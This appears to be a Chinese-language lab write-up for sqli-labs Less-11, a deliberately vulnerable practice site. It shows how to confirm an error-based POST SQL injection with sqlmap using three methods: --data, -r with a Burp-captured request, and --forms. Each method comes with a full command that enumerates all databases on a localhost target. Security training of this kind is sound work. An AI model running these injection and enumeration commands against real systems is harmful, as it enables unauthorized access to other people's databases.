sqli-labs less11 基于错误的POST型单引号字符型注入
一、知识储备
针对post型的表单,sqlmap有三种参数可验证:
–data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
–forms sqlmap中的自动抓包获取参数,最方便
二、验证漏洞
首先打开less11;
提交任意数据,用burp抓包;
记下post请求参数;uname=1111&passwd=11111&submit=Submit
这里介绍三种方法去检验该漏洞,满足一种证明该漏洞基本存在。
方法一:–data
找到需要提交的post参数,输入下面命令,–dbs枚举所有数据库名称;
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs
方法二:-r
将提交的报文抓包后,把信息存储在一个txt文件中,输入下面命令,–dbs枚举所有数据库名称;
python sqlmap.py -r 文件路径+文件名.txt --dbs
方法三:–forms
利用该命令,使sqlmap自己抓包,输入下面命令,–dbs枚举所有数据库名称
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --forms --level=5 --dbs
这时证明该漏洞确实存在。